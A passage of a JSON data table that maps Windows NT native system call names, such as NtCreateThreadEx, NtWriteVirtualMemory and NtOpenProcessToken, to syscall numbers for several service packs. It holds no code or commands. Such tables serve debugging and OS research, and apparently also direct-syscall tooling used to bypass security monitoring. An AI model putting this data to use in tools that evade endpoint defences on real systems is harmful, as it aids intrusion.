\"NtRegisterThreadTerminatePort\": \"306\", \"NtReleaseCMFViewOwnership\": \"307\", \"NtReleaseKeyedEvent\": \"308\", \"NtReleaseWorkerFactoryWorker\": \"309\", \"NtRemoveIoCompletionEx\": \"310\", \"NtRemoveProcessDebug\": \"311\", \"NtRenameKey\": \"312\", \"NtReplaceKey\": \"313\", \"NtReplyWaitReplyPort\": \"314\", \"NtRequestDeviceWakeup\": \"315\", \"NtRequestPort\": \"316\", \"NtRequestWakeupLatency\": \"317\", \"NtResetEvent\": \"318\", \"NtResetWriteWatch\": \"319\", \"NtRestoreKey\": \"320\", \"NtResumeProcess\": \"321\", \"NtRollbackComplete\": \"322\", \"NtRollbackEnlistment\": \"323\", \"NtRollbackSavepointTransaction\": \"324\", \"NtRollbackTransaction\": \"325\", \"NtRollforwardTransactionManager\": \"326\", \"NtSaveKey\": \"327\", \"NtSaveKeyEx\": \"328\", \"NtSaveMergedKeys\": \"329\", \"NtSavepointComplete\": \"330\", \"NtSavepointTransaction\": \"331\", \"NtSecureConnectPort\": \"332\", \"NtSetBootEntryOrder\": \"333\", \"NtSetBootOptions\": \"334\", \"NtSetContextThread\": \"335\", \"NtSetDebugFilterState\": \"336\", \"NtSetDefaultHardErrorPort\": \"337\", \"NtSetDefaultLocale\": \"338\", \"NtSetDefaultUILanguage\": \"339\", \"NtSetDriverEntryOrder\": \"340\", \"NtSetEaFile\": \"341\", \"NtSetHighEventPair\": \"342\", \"NtSetHighWaitLowEventPair\": \"343\", \"NtSetInformationDebugObject\": \"344\", \"NtSetInformationEnlistment\": \"345\", \"NtSetInformationJobObject\": \"346\", \"NtSetInformationKey\": \"347\", \"NtSetInformationResourceManager\": \"348\", \"NtSetInformationToken\": \"349\", \"NtSetInformationTransaction\": \"350\", \"NtSetInformationTransactionManager\": \"351\", \"NtSetInformationWorkerFactory\": \"352\", \"NtSetIntervalProfile\": \"353\", \"NtSetIoCompletion\": \"354\", \"NtSetLdtEntries\": \"355\", \"NtSetLowEventPair\": \"356\", \"NtSetLowWaitHighEventPair\": \"357\", \"NtSetQuotaInformationFile\": \"358\", \"NtSetSecurityObject\": \"359\", \"NtSetSystemEnvironmentValue\": \"360\", \"NtSetSystemEnvironmentValueEx\": \"361\", \"NtSetSystemInformation\": \"362\", \"NtSetSystemPowerState\": \"363\", \"NtSetSystemTime\": \"364\", \"NtSetThreadExecutionState\": \"365\", \"NtSetTimerResolution\": \"366\", \"NtSetUuidSeed\": \"367\", \"NtSetVolumeInformationFile\": \"368\", \"NtShutdownSystem\": \"369\", \"NtShutdownWorkerFactory\": \"370\", \"NtSignalAndWaitForSingleObject\": \"371\", \"NtSinglePhaseReject\": \"372\", \"NtStartProfile\": \"373\", \"NtStartTm\": \"374\", \"NtStopProfile\": \"375\", \"NtSuspendProcess\": \"376\", \"NtSuspendThread\": \"377\", \"NtSystemDebugControl\": \"378\", \"NtTerminateJobObject\": \"379\", \"NtTestAlert\": \"380\", \"NtThawRegistry\": \"381\", \"NtThawTransactions\": \"382\", \"NtTraceControl\": \"383\", \"NtTranslateFilePath\": \"384\", \"NtUnloadDriver\": \"385\", \"NtUnloadKey\": \"386\", \"NtUnloadKey2\": \"387\", \"NtUnloadKeyEx\": \"388\", \"NtUnlockFile\": \"389\", \"NtUnlockVirtualMemory\": \"390\", \"NtVdmControl\": \"391\", \"NtWaitForDebugEvent\": \"392\", \"NtWaitForKeyedEvent\": \"393\", \"NtWaitForWorkViaWorkerFactory\": \"394\", \"NtWaitHighEventPair\": \"395\", \"NtWaitLowEventPair\": \"396\", \"NtWorkerFactoryWorkerReady\": \"397\"}, \"SP1\": {\"NtMapUserPhysicalPagesScatter\": \"0\", \"NtWaitForSingleObject\": \"1\", \"NtCallbackReturn\": \"2\", \"NtReadFile\": \"3\", \"NtDeviceIoControlFile\": \"4\", \"NtWriteFile\": \"5\", \"NtRemoveIoCompletion\": \"6\", \"NtReleaseSemaphore\": \"7\", \"NtReplyWaitReceivePort\": \"8\", \"NtReplyPort\": \"9\", \"NtSetInformationThread\": \"10\", \"NtSetEvent\": \"11\", \"NtClose\": \"12\", \"NtQueryObject\": \"13\", \"NtQueryInformationFile\": \"14\", \"NtOpenKey\": \"15\", \"NtEnumerateValueKey\": \"16\", \"NtFindAtom\": \"17\", \"NtQueryDefaultLocale\": \"18\", \"NtQueryKey\": \"19\", \"NtQueryValueKey\": \"20\", \"NtAllocateVirtualMemory\": \"21\", \"NtQueryInformationProcess\": \"22\", \"NtWaitForMultipleObjects32\": \"23\", \"NtWriteFileGather\": \"24\", \"NtSetInformationProcess\": \"25\", \"NtCreateKey\": \"26\", \"NtFreeVirtualMemory\": \"27\", \"NtImpersonateClientOfPort\": \"28\", \"NtReleaseMutant\": \"29\", \"NtQueryInformationToken\": \"30\", \"NtRequestWaitReplyPort\": \"31\", \"NtQueryVirtualMemory\": \"32\", \"NtOpenThreadToken\": \"33\", \"NtQueryInformationThread\": \"34\", \"NtOpenProcess\": \"35\", \"NtSetInformationFile\": \"36\", \"NtMapViewOfSection\": \"37\", \"NtAccessCheckAndAuditAlarm\": \"38\", \"NtUnmapViewOfSection\": \"39\", \"NtReplyWaitReceivePortEx\": \"40\", \"NtTerminateProcess\": \"41\", \"NtSetEventBoostPriority\": \"42\", \"NtReadFileScatter\": \"43\", \"NtOpenThreadTokenEx\": \"44\", \"NtOpenProcessTokenEx\": \"45\", \"NtQueryPerformanceCounter\": \"46\", \"NtEnumerateKey\": \"47\", \"NtOpenFile\": \"48\", \"NtDelayExecution\": \"49\", \"NtQueryDirectoryFile\": \"50\", \"NtQuerySystemInformation\": \"51\", \"NtOpenSection\": \"52\", \"NtQueryTimer\": \"53\", \"NtFsControlFile\": \"54\", \"NtWriteVirtualMemory\": \"55\", \"NtCloseObjectAuditAlarm\": \"56\", \"NtDuplicateObject\": \"57\", \"NtQueryAttributesFile\": \"58\", \"NtClearEvent\": \"59\", \"NtReadVirtualMemory\": \"60\", \"NtOpenEvent\": \"61\", \"NtAdjustPrivilegesToken\": \"62\", \"NtDuplicateToken\": \"63\", \"NtContinue\": \"64\", \"NtQueryDefaultUILanguage\": \"65\", \"NtQueueApcThread\": \"66\", \"NtYieldExecution\": \"67\", \"NtAddAtom\": \"68\", \"NtCreateEvent\": \"69\", \"NtQueryVolumeInformationFile\": \"70\", \"NtCreateSection\": \"71\", \"NtFlushBuffersFile\": \"72\", \"NtApphelpCacheControl\": \"73\", \"NtCreateProcessEx\": \"74\", \"NtCreateThread\": \"75\", \"NtIsProcessInJob\": \"76\", \"NtProtectVirtualMemory\": \"77\", \"NtQuerySection\": \"78\", \"NtResumeThread\": \"79\", \"NtTerminateThread\": \"80\", \"NtReadRequestData\": \"81\", \"NtCreateFile\": \"82\", \"NtQueryEvent\": \"83\", \"NtWriteRequestData\": \"84\", \"NtOpenDirectoryObject\": \"85\", \"NtAccessCheckByTypeAndAuditAlarm\": \"86\", \"NtQuerySystemTime\": \"87\", \"NtWaitForMultipleObjects\": \"88\", \"NtSetInformationObject\": \"89\", \"NtCancelIoFile\": \"90\", \"NtTraceEvent\": \"91\", \"NtPowerInformation\": \"92\", \"NtSetValueKey\": \"93\", \"NtCancelTimer\": \"94\", \"NtSetTimer\": \"95\", \"NtAcceptConnectPort\": \"96\", \"NtAccessCheck\": \"97\", \"NtAccessCheckByType\": \"98\", \"NtAccessCheckByTypeResultList\": \"99\", \"NtAccessCheckByTypeResultListAndAuditAlarm\": \"100\", \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\": \"101\", \"NtAcquireCMFViewOwnership\": \"102\", \"NtAddBootEntry\": \"103\", \"NtAddDriverEntry\": \"104\", \"NtAdjustGroupsToken\": \"105\", \"NtAlertResumeThread\": \"106\", \"NtAlertThread\": \"107\", \"NtAllocateLocallyUniqueId\": \"108\", \"NtAllocateUserPhysicalPages\": \"109\", \"NtAllocateUuids\": \"110\", \"NtAlpcAcceptConnectPort\": \"111\", \"NtAlpcCancelMessage\": \"112\", \"NtAlpcConnectPort\": \"113\", \"NtAlpcCreatePort\": \"114\", \"NtAlpcCreatePortSection\": \"115\", \"NtAlpcCreateResourceReserve\": \"116\", \"NtAlpcCreateSectionView\": \"117\", \"NtAlpcCreateSecurityContext\": \"118\", \"NtAlpcDeletePortSection\": \"119\", \"NtAlpcDeleteResourceReserve\": \"120\", \"NtAlpcDeleteSectionView\": \"121\", \"NtAlpcDeleteSecurityContext\": \"122\", \"NtAlpcDisconnectPort\": \"123\", \"NtAlpcImpersonateClientOfPort\": \"124\", \"NtAlpcOpenSenderProcess\": \"125\", \"NtAlpcOpenSenderThread\": \"126\", \"NtAlpcQueryInformation\": \"127\", \"NtAlpcQueryInformationMessage\": \"128\", \"NtAlpcRevokeSecurityContext\": \"129\", \"NtAlpcSendWaitReceivePort\": \"130\", \"NtAlpcSetInformation\": \"131\", \"NtAreMappedFilesTheSame\": \"132\", \"NtAssignProcessToJobObject\": \"133\", \"NtCancelDeviceWakeupRequest\": \"134\", \"NtCancelIoFileEx\": \"135\", \"NtCancelSynchronousIoFile\": \"136\", \"NtCommitComplete\": \"137\", \"NtCommitEnlistment\": \"138\", \"NtCommitTransaction\": \"139\", \"NtCompactKeys\": \"140\", \"NtCompareTokens\": \"141\", \"NtCompleteConnectPort\": \"142\", \"NtCompressKey\": \"143\", \"NtConnectPort\": \"144\", \"NtCreateDebugObject\": \"145\", \"NtCreateDirectoryObject\": \"146\", \"NtCreateEnlistment\": \"147\", \"NtCreateEventPair\": \"148\", \"NtCreateIoCompletion\": \"149\", \"NtCreateJobObject\": \"150\", \"NtCreateJobSet\": \"151\", \"NtCreateKeyTransacted\": \"152\", \"NtCreateKeyedEvent\": \"153\", \"NtCreateMailslotFile\": \"154\", \"NtCreateMutant\": \"155\", \"NtCreateNamedPipeFile\": \"156\", \"NtCreatePagingFile\": \"157\", \"NtCreatePort\": \"158\", \"NtCreatePrivateNamespace\": \"159\", \"NtCreateProcess\": \"160\", \"NtCreateProfile\": \"161\", \"NtCreateResourceManager\": \"162\", \"NtCreateSemaphore\": \"163\", \"NtCreateSymbolicLinkObject\": \"164\", \"NtCreateThreadEx\": \"165\", \"NtCreateTimer\": \"166\", \"NtCreateToken\": \"167\", \"NtCreateTransaction\": \"168\", \"NtCreateTransactionManager\": \"169\", \"NtCreateUserProcess\": \"170\", \"NtCreateWaitablePort\": \"171\", \"NtCreateWorkerFactory\": \"172\", \"NtDebugActiveProcess\": \"173\", \"NtDebugContinue\": \"174\", \"NtDeleteAtom\": \"175\", \"NtDeleteBootEntry\": \"176\", \"NtDeleteDriverEntry\": \"177\", \"NtDeleteFile\": \"178\", \"NtDeleteKey\": \"179\", \"NtDeleteObjectAuditAlarm\": \"180\", \"NtDeletePrivateNamespace\": \"181\", \"NtDeleteValueKey\": \"182\", \"NtDisplayString\": \"183\", \"NtEnumerateBootEntries\": \"184\", \"NtEnumerateDriverEntries\": \"185\", \"NtEnumerateSystemEnvironmentValuesEx\": \"186\", \"NtEnumerateTransactionObject\": \"187\", \"NtExtendSection\": \"188\", \"NtFilterToken\": \"189\", \"NtFlushInstallUILanguage\": \"190\", \"NtFlushInstructionCache\": \"191\", \"NtFlushKey\": \"192\", \"NtFlushProcessWriteBuffers\": \"193\", \"NtFlushVirtualMemory\": \"194\", \"NtFlushWriteBuffer\": \"195\", \"NtFreeUserPhysicalPages\": \"196\", \"NtFreezeRegistry\": \"197\", \"NtFreezeTransactions\": \"198\", \"NtGetContextThread\": \"199\", \"NtGetCurrentProcessorNumber\": \"200\", \"NtGetDevicePowerState\": \"201\", \"NtGetMUIRegistryInfo\": \"202\", \"NtGetNextProcess\": \"203\", \"NtGetNextThread\": \"204\", \"NtGetNlsSectionPtr\": \"205\", \"NtGetNotificationResourceManager\": \"206\", \"NtGetPlugPlayEvent\": \"207\", \"NtGetWriteWatch\": \"208\", \"NtImpersonateAnonymousToken\": \"209\", \"NtImpersonateThread\": \"210\", \"NtInitializeNlsFiles\": \"211\", \"NtInitializeRegistry\": \"212\", \"NtInitiatePowerAction\": \"213\", \"NtIsSystemResumeAutomatic\": \"214\", \"NtIsUILanguageComitted\": \"215\", \"NtListenPort\": \"216\", \"NtLoadDriver\": \"217\", \"NtLoadKey\": \"218\", \"NtLoadKey2\": \"219\", \"NtLoadKeyEx\": \"220\", \"NtLockFile\": \"221\", \"NtLockProductActivationKeys\": \"222\", \"NtLockRegistryKey\": \"223\", \"NtLockVirtualMemory\": \"224\", \"NtMakePermanentObject\": \"225\", \"NtMakeTemporaryObject\": \"226\", \"NtMapCMFModule\": \"227\", \"NtMapUserPhysicalPages\": \"228\", \"NtModifyBootEntry\": \"229\", \"NtModifyDriverEntry\": \"230\", \"NtNotifyChangeDirectoryFile\": \"231\", \"NtNotifyChangeKey\": \"232\", \"NtNotifyChangeMultipleKeys\": \"233\", \"NtOpenEnlistment\": \"234\", \"NtOpenEventPair\": \"235\", \"NtOpenIoCompletion\": \"236\", \"NtOpenJobObject\": \"237\", \"NtOpenKeyTransacted\": \"238\", \"NtOpenKeyedEvent\": \"239\", \"NtOpenMutant\": \"240\", \"NtOpenObjectAuditAlarm\": \"241\", \"NtOpenPrivateNamespace\": \"242\", \"NtOpenProcessToken\": \"243\", \"NtOpenResourceManager\": \"244\", \"NtOpenSemaphore\": \"245\", \"NtOpenSession\": \"246\", \"NtOpenSymbolicLinkObject\": \"247\", \"NtOpenThread\": \"248\", \"NtOpenTimer\": \"249\", \"NtOpenTransaction\": \"250\", \"NtOpenTransactionManager\": \"251\", \"NtPlugPlayControl\": \"252\", \"NtPrePrepareComplete\": \"253\", \"NtPrePrepareEnlistment\": \"254\", \"NtPrepareComplete\": \"255\", \"NtPrepareEnlistment\": \"256\", \"NtPrivilegeCheck\": \"257\", \"NtPrivilegeObjectAuditAlarm\": \"258\", \"NtPrivilegedServiceAuditAlarm\": \"259\", \"NtPropagationComplete\": \"260\", \"NtPropagationFailed\": \"261\", \"NtPulseEvent\": \"262\", \"NtQueryBootEntryOrder\": \"263\", \"NtQueryBootOptions\": \"264\", \"NtQueryDebugFilterState\": \"265\", \"NtQueryDirectoryObject\": \"266\", \"NtQueryDriverEntryOrder\": \"267\", \"NtQueryEaFile\": \"268\", \"NtQueryFullAttributesFile\": \"269\", \"NtQueryInformationAtom\": \"270\", \"NtQueryInformationEnlistment\": \"271\", \"NtQueryInformationJobObject\": \"272\", \"NtQueryInformationPort\": \"273\", \"NtQueryInformationResourceManager\": \"274\", \"NtQueryInformationTransaction\": \"275\", \"NtQueryInformationTransactionManager\": \"276\", \"NtQueryInformationWorkerFactory\": \"277\", \"NtQueryInstallUILanguage\": \"278\", \"NtQueryIntervalProfile\": \"279\", \"NtQueryIoCompletion\": \"280\", \"NtQueryLicenseValue\": \"281\", \"NtQueryMultipleValueKey\": \"282\", \"NtQueryMutant\": \"283\", \"NtQueryOpenSubKeys\": \"284\", \"NtQueryOpenSubKeysEx\": \"285\", \"NtQueryPortInformationProcess\": \"286\", \"NtQueryQuotaInformationFile\": \"287\", \"NtQuerySecurityObject\": \"288\", \"NtQuerySemaphore\": \"289\", \"NtQuerySymbolicLinkObject\": \"290\", \"NtQuerySystemEnvironmentValue\": \"291\", \"NtQuerySystemEnvironmentValueEx\": \"292\", \"NtQueryTimerResolution\": \"293\", \"NtRaiseException\": \"294\", \"NtRaiseHardError\": \"295\", \"NtReadOnlyEnlistment\": \"296\", \"NtRecoverEnlistment\": \"297\", \"NtRecoverResourceManager\": \"298\", \"NtRecoverTransactionManager\": \"299\", \"NtRegisterProtocolAddressInformation\": \"300\", \"NtRegisterThreadTerminatePort\": \"301\", \"NtReleaseCMFViewOwnership\": \"302\", \"NtReleaseKeyedEvent\": \"303\", \"NtReleaseWorkerFactoryWorker\": \"304\", \"NtRemoveIoCompletionEx\": \"305\", \"NtRemoveProcessDebug\": \"306\", \"NtRenameKey\": \"307\", \"NtRenameTransactionManager\": \"308\", \"NtReplaceKey\": \"309\", \"NtReplacePartitionUnit\": \"310\", \"NtReplyWaitReplyPort\": \"311\", \"NtRequestDeviceWakeup\": \"312\", \"NtRequestPort\": \"313\", \"NtRequestWakeupLatency\": \"314\", \"NtResetEvent\": \"315\", \"NtResetWriteWatch\": \"316\", \"NtRestoreKey\": \"317\", \"NtResumeProcess\": \"318\", \"NtRollbackComplete\": \"319\", \"NtRollbackEnlistment\": \"320\", \"NtRollbackTransaction\": \"321\", \"NtRollforwardTransactionManager\": \"322\", \"NtSaveKey\": \"323\", \"NtSaveKeyEx\": \"324\", \"NtSaveMergedKeys\": \"325\", \"NtSecureConnectPort\": \"326\", \"NtSetBootEntryOrder\": \"327\", \"NtSetBootOptions\": \"328\", \"NtSetContextThread\": \"329\", \"NtSetDebugFilterState\": \"330\", \"NtSetDefaultHardErrorPort\": \"331\", \"NtSetDefaultLocale\": \"332\", \"NtSetDefaultUILanguage\": \"333\", \"NtSetDriverEntryOrder\": \"334\", \"NtSetEaFile\": \"335\", \"NtSetHighEventPair\": \"336\", \"NtSetHighWaitLowEventPair\": \"337\", \"NtSetInformationDebugObject\": \"338\", \"NtSetInformationEnlistment\": \"339\", \"NtSetInformationJobObject\": \"340\", \"NtSetInformationKey\": \"341\", \"NtSetInformationResourceManager\": \"342\", \"NtSetInformationToken\": \"343\", \"NtSetInformationTransaction\": \"344\", \"NtSetInformationTransactionManager\": \"345\", \"NtSetInformationWorkerFactory\": \"346\", \"NtSetIntervalProfile\": \"347\", \"NtSetIoCompletion\": \"348\", \"NtSetLdtEntries\": \"349\", \"NtSetLowEventPair\": \"350\", \"NtSetLowWaitHighEventPair\": \"351\", \"NtSetQuotaInformationFile\": \"352\", \"NtSetSecurityObject\": \"353\", \"NtSetSystemEnvironmentValue\": \"354\", \"NtSetSystemEnvironmentValueEx\": \"355\", \"NtSetSystemInformation\": \"356\", \"NtSetSystemPowerState\": \"357\", \"NtSetSystemTime\": \"358\", \"NtSetThreadExecutionState\": \"359\", \"NtSetTimerResolution\": \"360\", \"NtSetUuidSeed\": \"361\", \"NtSetVolumeInformationFile\": \"362\", \"NtShutdownSystem\": \"363\", \"NtShutdownWorkerFactory\": \"364\", \"NtSignalAndWaitForSingleObject\": \"365\", \"NtSinglePhaseReject\": \"366\", \"NtStartProfile\": \"367\", \"NtStopProfile\": \"368\", \"NtSuspendProcess\": \"369\", \"NtSuspendThread\": \"370\", \"NtSystemDebugControl\": \"371\", \"NtTerminateJobObject\": \"372\", \"NtTestAlert\": \"373\", \"NtThawRegistry\": \"374\", \"NtThawTransactions\": \"375\", \"NtTraceControl\": \"376\", \"NtTranslateFilePath\": \"377\", \"NtUnloadDriver\": \"378\", \"NtUnloadKey\": \"379\", \"NtUnloadKey2\": \"380\", \"NtUnloadKeyEx\": \"381\", \"NtUnlockFile\": \"382\", \"NtUnlockVirtualMemory\": \"383\", \"NtVdmControl\": \"384\", \"NtWaitForDebugEvent\": \"385\", \"NtWaitForKeyedEvent\": \"386\", \"NtWaitForWorkViaWorkerFactory\": \"387\", \"NtWaitHighEventPair\": \"388\", \"NtWaitLowEventPair\": \"389\", \"NtWorkerFactoryWorkerReady\": \"390\"}, \"SP2\": {\"NtMapUserPhysicalPagesScatter\": \"0\", \"NtWaitForSingleObject\": \"1\", \"NtCallbackReturn\": \"2\", \"NtReadFile\": \"3\", \"NtDeviceIoControlFile\": \"4\", \"NtWriteFile\": \"5\", \"NtRemoveIoCompletion\": \"6\", \"NtReleaseSemaphore\": \"7\", \"NtReplyWaitReceivePort\": \"8\", \"NtReplyPort\": \"9\", \"NtSetInformationThread\": \"10\", \"NtSetEvent\": \"11\", \"NtClose\": \"12\", \"NtQueryObject\": \"13\", \"NtQueryInformationFile\": \"14\", \"NtOpenKey\": \"15\", \"NtEnumerateValueKey\": \"16\", \"NtFindAtom\": \"17\", \"NtQueryDefaultLocale\": \"18\", \"NtQueryKey\": \"19\", \"NtQueryValueKey\": \"20\", \"NtAllocateVirtualMemory\": \"21\", \"NtQueryInformationProcess\": \"22\", \"NtWaitForMultipleObjects32\": \"23\", \"NtWriteFileGather\": \"24\", \"NtSetInformationProcess\": \"25\", \"NtCreateKey\": \"26\", \"NtFreeVirtualMemory\": \"27\", \"NtImpersonateClientOfPort\": \"28\", \"NtReleaseMutant\": \"29\", \"NtQueryInformationToken\": \"30\", \"NtRequestWaitReplyPort\": \"31\", \"NtQueryVirtualMemory\": \"32\", \"NtOpenThreadToken\": \"33\", \"NtQueryInformationThread\": \"34\", \"NtOpenProcess\": \"35\", \"NtSetInformationFile\": \"36\", \"NtMapViewOfSection\": \"37\", \"NtAccessCheckAndAuditAlarm\": \"38\", \"NtUnmapViewOfSection\": \"39\", \"NtReplyWaitReceivePortEx\": \"40\", \"NtTerminateProcess\": \"41\", \"NtSetEventBoostPriority\": \"42\", \"NtReadFileScatter\": \"43\", \"NtOpenThreadTokenEx\": \"44\", \"NtOpenProcessTokenEx\": \"45\", \"NtQueryPerformanceCounter\": \"46\", \"NtEnumerateKey\": \"47\", \"NtOpenFile\": \"48\", \"NtDelayExecution\": \"49\", \"NtQueryDirectoryFile\": \"50\", \"NtQuerySystemInformation\": \"51\", \"NtOpenSection\": \"52\", \"NtQueryTimer\": \"53\", \"NtFsControlFile\": \"54\", \"NtWriteVirtualMemory\": \"55\", \"NtCloseObjectAuditAlarm\": \"56\", \"NtDuplicateObject\": \"57\", \"NtQueryAttributesFile\": \"58\", \"NtClearEvent\": \"59\", \"NtReadVirtualMemory\": \"60\", \"NtOpenEvent\": \"61\", \"NtAdjustPrivilegesToken\": \"62\", \"NtDuplicateToken\": \"63\", \"NtContinue\": \"64\", \"NtQueryDefaultUILanguage\": \"65\", \"NtQueueApcThread\": \"66\", \"NtYieldExecution\": \"67\", \"NtAddAtom\": \"68\", \"NtCreateEvent\": \"69\", \"NtQueryVolumeInformationFile\": \"70\", \"NtCreateSection\": \"71\", \"NtFlushBuffersFile\": \"72\", \"NtApphelpCacheControl\": \"73\", \"NtCreateProcessEx\": \"74\", \"NtCreateThread\": \"75\", \"NtIsProcessInJob\": \"76\", \"NtProtectVirtualMemory\": \"77\", \"NtQuerySection\": \"78\", \"NtResumeThread\": \"79\", \"NtTerminateThread\": \"80\", \"NtReadRequestData\": \"81\", \"NtCreateFile\": \"82\", \"NtQueryEvent\": \"83\", \"NtWriteRequestData\": \"84\", \"NtOpenDirectoryObject\": \"85\", \"NtAccessCheckByTypeAndAuditAlarm\": \"86\", \"NtQuerySystemTime\": \"87\", \"NtWaitForMultipleObjects\": \"88\", \"NtSetInformationObject\": \"89\", \"NtCancelIoFile\": \"90\", \"NtTraceEvent\": \"91\", \"NtPowerInformation\": \"92\", \"NtSetValueKey\": \"93\", \"NtCancelTimer\": \"94\", \"NtSetTimer\": \"95\", \"NtAcceptConnectPort\": \"96\", \"NtAccessCheck\": \"97\", \"NtAccessCheckByType\": \"98\", \"NtAccessCheckByTypeResultList\": \"99\", \"NtAccessCheckByTypeResultListAndAuditAlarm\": \"100\", \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\": \"101\", \"NtAcquireCMFViewOwnership\": \"102\", \"NtAddBootEntry\": \"103\", \"NtAddDriverEntry\": \"104\", \"NtAdjustGroupsToken\": \"105\", \"NtAlertResumeThread\": \"106\", \"NtAlertThread\": \"107\", \"NtAllocateLocallyUniqueId\": \"108\", \"NtAllocateUserPhysicalPages\": \"109\", \"NtAllocateUuids\": \"110\", \"NtAlpcAcceptConnectPort\": \"111\", \"NtAlpcCancelMessage\": \"112\", \"NtAlpcConnectPort\": \"113\", \"NtAlpcCreatePort\": \"114\", \"NtAlpcCreatePortSection\": \"115\", \"NtAlpcCreateResourceReserve\": \"116\", \"NtAlpcCreateSectionView\": \"117\", \"NtAlpcCreateSecurityContext\": \"118\", \"NtAlpcDeletePortSection\": \"119\", \"NtAlpcDeleteResourceReserve\": \"120\", \"NtAlpcDeleteSectionView\": \"121\", \"NtAlpcDeleteSecurityContext\": \"122\", \"NtAlpcDisconnectPort\": \"123\", \"NtAlpcImpersonateClientOfPort\": \"124\", \"NtAlpcOpenSenderProcess\": \"125\", \"NtAlpcOpenSenderThread\": \"126\", \"NtAlpcQueryInformation\": \"127\", \"NtAlpcQueryInformationMessage\": \"128\", \"NtAlpcRevokeSecurityContext\": \"129\", \"NtAlpcSendWaitReceivePort\": \"130\", \"NtAlpcSetInformation\": \"131\", \"NtAreMappedFilesTheSame\": \"132\", \"NtAssignProcessToJobObject\": \"133\", \"NtCancelDeviceWakeupRequest\": \"134\", \"NtCancelIoFileEx\": \"135\", \"NtCancelSynchronousIoFile\": \"136\", \"NtCommitComplete\": \"137\", \"NtCommitEnlistment\": \"138\", \"NtCommitTransaction\": \"139\", \"NtCompactKeys\": \"140\", \"NtCompareTokens\": \"141\", \"NtCompleteConnectPort\": \"142\", \"NtCompressKey\": \"143\", \"NtConnectPort\": \"144\", \"NtCreateDebugObject\": \"145\", \"NtCreateDirectoryObject\": \"146\", \"NtCreateEnlistment\": \"147\", \"NtCreateEventPair\": \"148\", \"NtCreateIoCompletion\": \"149\", \"NtCreateJobObject\": \"150\", \"NtCreateJobSet\": \"151\", \"NtCreateKeyTransacted\": \"152\", \"NtCreateKeyedEvent\": \"153\", \"NtCreateMailslotFile\": \"154\", \"NtCreateMutant\": \"155\", \"NtCreateNamedPipeFile\": \"156\", \"NtCreatePagingFile\": \"157\", \"NtCreatePort\": \"158\", \"NtCreatePrivateNamespace\": \"159\", \"NtCreateProcess\": \"160\", \"NtCreateProfile\": \"161\", \"NtCreateResourceManager\": \"162\", \"NtCreateSemaphore\": \"163\", \"NtCreateSymbolicLinkObject\": \"164\", \"NtCreateThreadEx\": \"165\", \"NtCreateTimer\": \"166\", \"NtCreateToken\": \"167\", \"NtCreateTransaction\": \"168\", \"NtCreateTransactionManager\": \"169\", \"NtCreateUserProcess\": \"170\", \"NtCreateWaitablePort\": \"171\", \"NtCreateWorkerFactory\": \"172\", \"NtDebugActiveProcess\": \"173\", \"NtDebugContinue\": \"174\", \"NtDeleteAtom\": \"175\", \"NtDeleteBootEntry\": \"176\", \"NtDeleteDriverEntry\": \"177\", \"NtDeleteFile\": \"178\", \"NtDeleteKey\": \"179\", \"NtDeleteObjectAuditAlarm\": \"180\", \"NtDeletePrivateNamespace\": \"181\", \"NtDeleteValueKey\": \"182\", \"NtDisplayString\": \"183\", \"NtEnumerateBootEntries\": \"184\", \"NtEnumerateDriverEntries\": \"185\", \"NtEnumerateSystemEnvironmentValuesEx\": \"186\", \"NtEnumerateTransactionObject\": \"187\", \"NtExtendSection\": \"188\", \"NtFilterToken\": \"189\", \"NtFlushInstallUILanguage\": \"190\", \"NtFlushInstructionCache\": \"191\", \"NtFlushKey\": \"192\", \"NtFlushProcessWriteBuffers\": \"193\", \"NtFlushVirtualMemory\": \"194\", \"NtFlushWriteBuffer\": \"195\", \"NtFreeUserPhysicalPages\": \"196\", \"NtFreezeRegistry\": \"197\", \"NtFreezeTransactions\": \"198\", \"NtGetContextThread\": \"199\", \"NtGetCurrentProcessorNumber\": \"200\", \"NtGetDevicePowerState\": \"201\", \"NtGetMUIRegistryInfo\": \"202\", \"NtGetNextProcess\": \"203\", \"NtGetNextThread\": \"204\", \"NtGetNlsSectionPtr\": \"205\", \"NtGetNotificationResourceManager\": \"206\", \"NtGetPlugPlayEvent\": \"207\", \"NtGetWriteWatch\": \"208\", \"NtImpersonateAnonymousToken\": \"209\", \"NtImpersonateThread\": \"210\", \"NtInitializeNlsFiles\": \"211\", \"NtInitializeRegistry\": \"212\", \"NtInitiatePowerAction\": \"213\", \"NtIsSystemResumeAutomatic\": \"214\", \"NtIsUILanguageComitted\": \"215\", \"NtListenPort\": \"216\", \"NtLoadDriver\": \"217\", \"NtLoadKey\": \"218\", \"NtLoadKey2\": \"219\", \"NtLoadKeyEx\": \"220\", \"NtLockFile\": \"221\", \"NtLockProductActivationKeys\": \"222\", \"NtLockRegistryKey\": \"223\", \"NtLockVirtualMemory\": \"224\", \"NtMakePermanentObject\": \"225\", \"NtMakeTemporaryObject\": \"226\", \"NtMapCMFModule\": \"227\", \"NtMapUserPhysicalPages\": \"228\", \"NtModifyBootEntry\": \"229\", \"NtModifyDriverEntry\": \"230\", \"NtNotifyChangeDirectoryFile\": \"231\", \"NtNotifyChangeKey\": \"232\", \"NtNotifyChangeMultipleKeys\": \"233\", \"NtOpenEnlistment\": \"234\", \"NtOpenEventPair\": \"235\", \"NtOpenIoCompletion\": \"236\", \"NtOpenJobObject\": \"237\", \"NtOpenKeyTransacted\": \"238\", \"NtOpenKeyedEvent\": \"239\", \"NtOpenMutant\": \"240\", \"NtOpenObjectAuditAlarm\": \"241\", \"NtOpenPrivateNamespace\": \"242\", \"NtOpenProcessToken\": \"243\", \"NtOpenResourceManager\": \"244\", \"NtOpenSemaphore\": \"245\", \"NtOpenSession\": \"246\", \"NtOpenSymbolicLinkObject\": \"247\", \"NtOpenThread\": \"248\", \"NtOpenTimer\": \"249\", \"NtOpenTransaction\": \"250\", \"NtOpenTransactionManager\": \"251\", \"NtPlugPlayControl\": \"252\", \"NtPrePrepareComplete\": \"253\", \"NtPrePrepareEnlistment\": \"254\", \"NtPrepareComplete\": \"255\", \"NtPrepareEnlistment\": \"256\", \"NtPrivilegeCheck\": \"257\", \"NtPrivilegeObjectAuditAlarm\": \"258\", \"NtPrivilegedServiceAuditAlarm\": \"259\", \"NtPropagationComplete\": \"260\", \"NtPropagationFailed\": \"261\", \"NtPulseEvent\": \"262\", \"NtQueryBootEntryOrder\": \"263\", \"NtQueryBootOptions\": \"264\", \"NtQueryDebugFilterState\": \"265\", \"NtQueryDirectoryObject\": \"266\", \"NtQueryDriverEntryOrder\": \"267\", 